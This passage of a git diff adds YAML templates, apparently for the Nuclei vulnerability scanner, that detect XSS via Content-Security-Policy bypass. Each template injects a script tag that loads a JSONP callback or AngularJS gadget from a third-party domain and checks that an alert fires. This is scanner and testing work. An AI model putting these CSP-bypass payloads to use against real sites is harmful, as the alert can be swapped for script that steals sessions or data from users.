+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,dblp
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://dblp.org/search/venue/api?q=&h=1000&c=0&rd=1a&format=jsonp&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: dblp_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "dblp_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/demo-matomo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/demo-matomo-csp-xss.yaml
new file mode 100644
index 00000000000..0fac2a05425
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/demo-matomo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: demo-matomo-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Matomo Demo
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,matomo
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://demo.matomo.cloud/?module=API&method=Overlay.getTranslations&idSite=1&format=JSON&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: demo_matomo_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "demo_matomo_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/dev-virtualearth-csp-xss.yaml b/dast/vulnerabilities/xss/csp/dev-virtualearth-csp-xss.yaml
new file mode 100644
index 00000000000..b464325ecdd
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/dev-virtualearth-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: dev-virtualearth-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Virtual Earth
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,virtualearth
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://dev.virtualearth.net/REST/v1/Imagery/Metadata/Road?jsonp=alert(document.domain);//"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: dev_virtualearth_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "dev_virtualearth_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/developer-apple-csp-xss.yaml b/dast/vulnerabilities/xss/csp/developer-apple-csp-xss.yaml
new file mode 100644
index 00000000000..fe2344d5f56
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/developer-apple-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: developer-apple-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Apple Developer
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,apple
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://developer.apple.com/search/scripts/vendor/angular-custom.min.js"></script><div ng-app><img src=x ng-on-error="window=$event.target.ownerDocument.defaultView;window.alert(window.origin);">'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: developer_apple_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "developer_apple_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml b/dast/vulnerabilities/xss/csp/digitalocean-anchor-csp-xss.yaml
similarity index 54%
rename from dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml
rename to dast/vulnerabilities/xss/csp/digitalocean-anchor-csp-xss.yaml
index 3b0a14968b5..352443f01a7 100644
--- a/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml
+++ b/dast/vulnerabilities/xss/csp/digitalocean-anchor-csp-xss.yaml
@@ -1,11 +1,11 @@
-id: digitalocean-csp-xss
+id: digitalocean-anchor-csp-xss
 
 info:
   name: Content-Security-Policy Bypass via DigitalOcean Anchor
-  author: DhiyaneshDK
-  severity: high
+  author: renniepak,DhiyaneshDK
+  severity: medium
   reference:
-    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L12C25-L12C151
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
   metadata:
     verified: true
   tags: xss,csp-bypass,digitalocean
@@ -33,15 +33,23 @@ http:
         part: body
         words:
           - "{{injection}}"
+        internal: true
 
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
 
-      - type: word
-        part: content_security_policy
-        words:
-          - "anchor.digitalocean.com"
-          - "script-src"
-        condition: and
\ No newline at end of file
+      - action: waitload
+
+      - action: waitdialog
+        name: digitalocean_anchor_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "digitalocean_anchor_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/documentation-resources-opendatasoft-csp-xss.yaml b/dast/vulnerabilities/xss/csp/documentation-resources-opendatasoft-csp-xss.yaml
new file mode 100644
index 00000000000..c1018966e39
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/documentation-resources-opendatasoft-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: documentation-resources-opendatasoft-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Opendatasoft Documentation
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,opendatasoft
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://documentation-resources.opendatasoft.com/api/datasets/1.0/doc-geonames-cities-5000/?format=jsonp&callback=confirm(1);"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: documentation_resources_opendatasoft_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "documentation_resources_opendatasoft_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/don-bild-csp-xss.yaml b/dast/vulnerabilities/xss/csp/don-bild-csp-xss.yaml
new file mode 100644
index 00000000000..c9f676fd230
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/don-bild-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: don-bild-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Bild
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,bild
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://don.bild.de/glg/userDetails?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: don_bild_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "don_bild_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/dpm-demdex-csp-xss.yaml b/dast/vulnerabilities/xss/csp/dpm-demdex-csp-xss.yaml
new file mode 100644
index 00000000000..42594a19e6d
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/dpm-demdex-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: dpm-demdex-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Demdex
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,demdex
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://dpm.demdex.net/id?d_cb=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: dpm_demdex_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "dpm_demdex_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/duckduckgo-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/duckduckgo-api-csp-xss.yaml
new file mode 100644
index 00000000000..fe6a00a0076
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/duckduckgo-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: duckduckgo-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via DuckDuckGo API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,duckduckgo
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.duckduckgo.com/?q=x&callback=alert&format=json"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: duckduckgo_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "duckduckgo_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/dynamic-criteo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/dynamic-criteo-csp-xss.yaml
new file mode 100644
index 00000000000..15b67acae93
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/dynamic-criteo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: dynamic-criteo-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Criteo Dynamic
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,criteo
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://dynamic.criteo.com/js/ld/s2s.js?p=1&c=1&j=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: dynamic_criteo_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "dynamic_criteo_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/elysiumwebsite-s3-csp-xss.yaml b/dast/vulnerabilities/xss/csp/elysiumwebsite-s3-csp-xss.yaml
new file mode 100644
index 00000000000..55af634a271
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/elysiumwebsite-s3-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: elysiumwebsite-s3-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Elysium S3
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,aws
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="//elysiumwebsite.s3.amazonaws.com/uploads/blog-media/rockstar/angular.min.js"></script><div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == \'window\'">{{ [1].reduce(value.alert, 1); }}</div></div></div></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: elysiumwebsite_s3_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "elysiumwebsite_s3_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/eu-battle-net-csp-xss.yaml b/dast/vulnerabilities/xss/csp/eu-battle-net-csp-xss.yaml
new file mode 100644
index 00000000000..e17d0ab900b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/eu-battle-net-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: eu-battle-net-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Battle.net EU
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,battlenet
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://eu.battle.net/support/update/json?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: eu_battle_net_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "eu_battle_net_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/facebook-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/facebook-api-csp-xss.yaml
new file mode 100644
index 00000000000..0a692716d06
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/facebook-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: facebook-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Facebook API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,facebook
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.facebook.com/restserver.php?method=fql.query&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: facebook_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "facebook_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/facebook-csp-xss.yaml b/dast/vulnerabilities/xss/csp/facebook-csp-xss.yaml
new file mode 100644
index 00000000000..8b1cdc20718
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/facebook-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: facebook-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Facebook
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,facebook
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://connect.facebook.net/en_US/sdk.js?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: facebook_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "facebook_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/fast-wistia-csp-xss.yaml b/dast/vulnerabilities/xss/csp/fast-wistia-csp-xss.yaml
new file mode 100644
index 00000000000..060bc59f46f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/fast-wistia-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: fast-wistia-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Wistia
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,wistia
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://fast.wistia.com/embed/medias/o75jtw7654.json?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: fast_wistia_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "fast_wistia_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/flickr-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/flickr-api-csp-xss.yaml
new file mode 100644
index 00000000000..ca925f0b35f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/flickr-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: flickr-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Flickr API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,flickr
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.flickr.com/services/feeds/photos_friends.gne?user_id=44979707@N00&friends=0&display_all=1&format=json&jsoncallback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: flickr_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "flickr_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/forismatic-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/forismatic-api-csp-xss.yaml
new file mode 100644
index 00000000000..0196cca21bd
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/forismatic-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: forismatic-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Forismatic API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,forismatic
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.forismatic.com/api/1.0/?format=jsonp&method=getQuote&jsonp=alert&lang=en"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: forismatic_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "forismatic_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/forms-hsforms-csp-xss.yaml b/dast/vulnerabilities/xss/csp/forms-hsforms-csp-xss.yaml
new file mode 100644
index 00000000000..3ea58b62c2c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/forms-hsforms-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: forms-hsforms-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via HubSpot Forms
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,hubspot
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://forms.hsforms.com/embed/v3/form/1/00000000-0000-0000-0000-000000000000?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: forms_hsforms_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "forms_hsforms_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/forms-hubspot-csp-xss.yaml b/dast/vulnerabilities/xss/csp/forms-hubspot-csp-xss.yaml
new file mode 100644
index 00000000000..ef1b668cacf
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/forms-hubspot-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: forms-hubspot-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via HubSpot
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,hubspot
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://forms.hubspot.com/embed/v3/form/2059467/2e1a1b5b-27bb-447d-aac4-0b87c1e88fec?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: forms_hubspot_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "forms_hubspot_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml b/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml
index d6d09a10b0a..ff73bdbe68a 100644
--- a/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml
+++ b/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml
@@ -1,11 +1,11 @@
 id: fwmrm-csp-xss
 
 info:
-  name: Content-Security-Policy Bypass via FreeWheel
-  author: DhiyaneshDK
-  severity: high
+  name: Content-Security-Policy Bypass via Fwmrm
+  author: renniepak,DhiyaneshDK
+  severity: medium
   reference:
-    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L2C19-L2C113
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
   metadata:
     verified: true
   tags: xss,csp-bypass,fwmrm
@@ -18,7 +18,7 @@ http:
 
     payloads:
       injection:
-        - '<script src="https://7b936.v.fwmrm.net/ad/g/1?nw=1&csid=1&resp=json&cbfn=alert(1)-"></script>'
+        - '<script src="https://fwmrm.net/p/1?callback=alert"></script>'
 
     fuzzing:
       - part: query
@@ -33,15 +33,23 @@ http:
         part: body
         words:
           - "{{injection}}"
+        internal: true
 
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
 
-      - type: word
-        part: content_security_policy
-        words:
-          - "fwmrm.net"
-          - "script-src"
-        condition: and
\ No newline at end of file
+      - action: waitload
+
+      - action: waitdialog
+        name: fwmrm_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "fwmrm_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/geo-moatads-csp-xss.yaml b/dast/vulnerabilities/xss/csp/geo-moatads-csp-xss.yaml
new file mode 100644
index 00000000000..696c9924bb3
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/geo-moatads-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: geo-moatads-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Moat Ads
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,moatads
+
+http:
+  - pre-condition:
+      - type: dsl
